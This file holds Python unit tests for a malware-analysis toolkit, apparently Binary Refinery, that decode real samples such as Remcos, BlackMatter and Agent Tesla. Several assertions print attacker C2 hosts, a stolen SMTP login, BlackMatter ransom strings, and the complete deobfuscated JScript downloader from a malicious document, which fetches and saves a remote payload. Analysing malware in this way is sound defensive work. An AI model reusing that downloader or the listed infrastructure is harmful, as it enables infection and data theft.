def test_shellcode_loader(self): data = self.download_sample( '58ba30052d249805caae0107a0e2a5a3cb85f3000ba5479fafb7767e2a5a78f3') pipeline = load_pipeline( 'rex yara:50607080.* [| struct LL{s:L}{} | xor -B2 accu[s]:@msvc | xtp url ]' ) self.assertEqual(str(data | pipeline), 'http://64.235.39' '.82')
def test_remcos_sample(self): data = self.download_sample( 'c0019718c4d4538452affb97c70d16b7af3e4816d059010c277c4e579075c944') pipeline = load_pipeline( 'perc SETTINGS [| put keylen cut::1 | rc4 cut::keylen | xtp socket ]' ) self.assertEqual('remm.duckdns' '.' 'org:7007', str(data | pipeline))
def test_sockaddr_decoding(self): pipeline = load_pipeline( 'emit "0x51110002 0xAFBAFA12" | pack -B4 | struct 2x{port:!H}{addr:4}{} [' ' | push var:addr [| pack -R [| sep . ]| pop addr ]| cfmt {addr}:{port} ]' ) result = pipeline() self.assertEqual(result, B'18.250.186.175:4433')
def test_pe_extraction_from_pcap(self): data = self.download_sample( '1baf0e669f38b94487b671fab59929129b5b1c2755bc00510812e8a96a53e10e') pipeline = load_pipeline('pcap-http [| pick 3 ]') chunk = next(data | pipeline) self.assertEqual(chunk['url'], B'http://www.tao168188' B'.com:1046/mh.exe') self.assertEqual( hashlib.sha256(chunk).hexdigest(), '9972394d4d8d51abf15bfaf6c1ddfe9c8bf85ae0b9b0a561adfd9b4844c520b9')
def filter(self, chunks): it: Iterable[Chunk] = iter(chunks) name = self.args.temp init = self.args.init data = next(it) if init is None else self.labelled(init) unit: Unit = load_pipeline('\t'.join(self.args.reduction)) for chunk in it: data.meta.update(chunk.meta) data[name] = chunk unit.args(data) data[:] = unit.act(data) yield data
def test_blackmatter_sample(self): data = self.download_sample( 'c6e2ef30a86baa670590bd21acf5b91822117e0cbe6060060bc5fe0182dace99') pipeline = load_pipeline( 'push [| vsect .rsrc | struct {KS:L}{} | pop | vsect .data | struct -m L{:{0}}' '| xor -B4 "accu[KS,1,32]:(A*0x8088405+1)#((KS*A)>>32)" | repl h:00 | carve -n8 printable ]]' ) strings = str(data | pipeline).splitlines(False) self.assertIn('Safari/537.36', strings) self.assertIn('bcdedit /set {current} safeboot network', strings) self.assertTrue( any('"bot_company":"%.8x%.8x%.8x%.8x%"' in x for x in strings)) self.assertTrue( any('BlackMatter Ransomware encrypted all your files!' in x for x in strings))
def test_agent_tesla_sample(self): data = self.download_sample( 'fb47a566911905d37bdb464a08ca66b9078f18f10411ce019e9d5ab747571b40') pipeline = load_pipeline( R'dnfields [| aes x::32 --iv x::16 -Q | sep ]| rex -M "((??email))\n(.*)\n(.*)\n:Zone" addr={1} pass={2} host={3}' ) result = str(data | pipeline) self.assertListEqual(result.splitlines(False), [ 'addr=ioanna@pgm' '-gruop' '.eu', 'pass=Password2019', 'host=smtp.pgm' '-gruop' '.eu', ])
def test_get_request_summary(self): data = self.download_sample( '1baf0e669f38b94487b671fab59929129b5b1c2755bc00510812e8a96a53e10e') pipeline = load_pipeline(R'pcap [| rex "^GET\s[^\s]+" | sep ]') result = str(data | pipeline) self.assertEqual( result, '\n'.join(( 'GET /286/pop.asp?url=http://www.puma164.' 'com/pu/39685867.htm?2', 'GET /favicon.ico', 'GET /286//update.txt', 'GET /286/soft/163.exe', 'GET /286/count/count.asp?mac=00-0E-0C-33-1C-80&ver=2007051922&user=00&md5=258a993832e5f435cc3a7ba4791bc3de&pc=BOBTWO', 'GET /mh.exe', 'GET /12.exe', 'GET /286/pop.asp?url=http://59.34.197.' '164:81/804635/adx352133.asp', )))
def test_example_02_maldoc(self): data = self.download_sample( 'ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394') pipeline = load_pipeline( 'doctxt | repl drp:c: | carve -s b64 | rev | b64 | rev | ppjscript' ) self.assertEqual( str(data | pipeline), '\n'.join(( r'var girlLikeDoor = new ActiveXObject("msxml2.xmlhttp");', r'girlLikeDoor.open("GET", "http://shoulderelliottd' r'.com/boolk/QlaJk8C6vYqIyEwbdypBHv3yJR/wrWWNCD/77427/bebys8' r'?cid=Bm9cAP&wP8zhkK=aNLC3bJChZM5GauIB&=S0MRS72jqtkORxKA3iUkjdS", false);', r'girlLikeDoor.send();', r'if (girlLikeDoor.status == 200) {', r' try {', r' var karolYouGirl = new ActiveXObject("adodb.stream");', r' karolYouGirl.open;', r' karolYouGirl.type = 1;', r' karolYouGirl.write(girlLikeDoor.responsebody);', r' karolYouGirl.savetofile("c:\\users\\public\\tubeGirlLoad.jpg", 2);', r' karolYouGirl.close;', r' } catch (e) {}', r'}', )))
def emit(line: str, cell=None): if cell is not None: line = line + re.sub(R'[\r\n]+\s*', '\x20', cell) line = re.sub(R'(?<=\[|\])\x20*\|', '|', line) load_pipeline.cache_clear() load_pipeline(F'emit {line}') | FakeTTY()
def test_emit_keeps_metadata_02(self): with temporary_clipboard('baz'): pl = load_pipeline('emit bort | push [[| rex (?P<foo>...)t | pop ]| emit | cfmt {foo}{} ]') pl = bytes(pl()) self.assertEqual(pl, b'borbaz')
def test_emit_keeps_metadata_01(self): with temporary_clipboard('baz'): pl = load_pipeline('emit a [| put foo bar | emit | cfmt {foo}{} ]') pl = bytes(pl()) self.assertEqual(pl, b'barbaz')
def test_simple_01(self): ps = BR'"C:\\work\\is\\fun\\"'.hex() result = load_pipeline( RF'emit H:{ps} | carve -d string [| iffp path ]') result = result() self.assertEqual(result, B'C:\\work\\is\\fun\\')
def test_hex_byte_strings(self): pl = load_pipeline('emit Hello [| cm -2 | cfmt {sha256!r} ]') self.assertEqual(pl(), b'185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969')
def test_intrinsic_properties_are_recomputed(self): pl = load_pipeline('emit FOO-BAR [| cm size | snip :1 | cfmt {size} ]') self.assertEqual(pl(), B'1')
def test_units_can_overwrite_parent_metavars(self): out, = load_pipeline('emit ABCD [| rex .... | rex B ]') self.assertEqual(out['offset'], 1)
def test_scroll_past_invisible_chunks(self): pl = load_pipeline( 'emit FOO [| push [| rex . | pick :1 | iff size -eq 1 | pop o ]| ccp var:o ]' ) self.assertEqual(pl(), B'FFOO')
def test_msvc(self): pl = loader.load_pipeline('emit rep[32]:H:00 [| put s 0xF23CA2 | xor -B2 accu[s]:@msvc ]') self.assertEqual(pl(), bytes.fromhex('500BC53065647A48899EE4D7F07166A7643AB3EC9F4343A64DF5C45B4CC4D9B2'))
def test_cheap_variable_is_not_discarded(self): out, = load_pipeline('emit rep[0x100]:X [| cm sha256 | snip 1: ]') self.assertIn('sha256', out.meta.keys()) self.assertEqual(out.meta['sha256'], '439d26737c1313821f1b5e953a866e680a3712086f7b27ffc2e3e3f224e04f3f')
def test_costly_variable_is_discarded(self): out, = load_pipeline('emit rep[0x2000]:X [| cm sha256 | snip 1: ]') self.assertNotIn('sha256', out.meta.keys())
def test_magic_values_update(self): pl = load_pipeline('emit FOO-BAR [| cm sha256 | snip :3 | cfmt {sha256} ]') self.assertEqual(pl(), b'9520437ce8902eb379a7d8aaa98fc4c94eeb07b6684854868fa6f72bf34b0fd3')
def test_filter_empty_chunks(self): pl = load_pipeline('emit AAA==FCC [| resplit = | b64 | iff | emit . ]') self.assertEqual(pl(), B'..')
def test_bug_conditional_units_generate_empty_chunks(self): pipeline = load_pipeline('emit A | rex .. [| iff -t 1 | cfmt boom ]]') self.assertEqual(pipeline(), B'')